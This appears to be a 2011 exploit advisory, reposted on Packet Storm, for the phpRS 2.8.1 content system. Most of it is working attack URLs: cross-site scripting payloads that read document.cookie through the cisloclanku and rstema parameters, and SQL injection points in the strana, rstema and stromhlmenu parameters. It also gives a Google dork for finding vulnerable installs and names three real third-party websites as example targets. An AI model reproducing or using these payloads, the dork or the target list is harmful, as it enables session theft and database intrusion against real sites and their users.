phpRS version 2.8.1 suffers from cross site scripting and remote SQL injection vulnerabilities.
b19cfe13ab6c40445258baa9295b98457e1244a6ebfb220284a38f8c7d96813f
# Exploit Title: phpRS Multiple Vulnerabilities
# Google Dork: powered by phpRS
# Date: 2011-sep-18
# Author: iM4n
# Software Link: http://www.supersvet.cz/download.php
# Version: 2.8.1
# Tested on: FreeBSD - Cent OS
£££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££
*/ Cross Site Scripting:
http://Target/phpRS Path/view.php?cisloclanku=1%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://Target/phpRS Path/search.php?rstema=%3Cbody%20onload%3dalert%28document.cookie%29%3E&rstext=all-phpRS-all&rsvelikost=sab
£££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££
£££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££
*/ Sql Injection:
http://Target/phpRS Path/?strana=%24%7binjecthere%7d
http://Target/phpRS Path/index.php?strana=%24%7binjecthere%7d
http://Target/phpRS Path/search.php?rstema=%24%7binjecthere%7d&rstext=all-phpRS-all&rsvelikost=sab
http://Target/phpRS Path/search.php?rstema=7&rstext=all-phpRS-all&rsvelikost=sab&stromhlmenu=%24%7binjecthere%7d
½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½½
Example:
http://www.phonet.sk/en/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=7[sqli]&stromhlmenu=3[sqli]
http://www.sevencz.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=[sqli]
http://www.instar.cz/en/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=[sqli]
£££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££
Emperor Never Die
iM4n - Spyn3t - 777 - Cl4w - ***3
Greetz to: Shabgard Security Group - Zombies Underground & all my friends
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed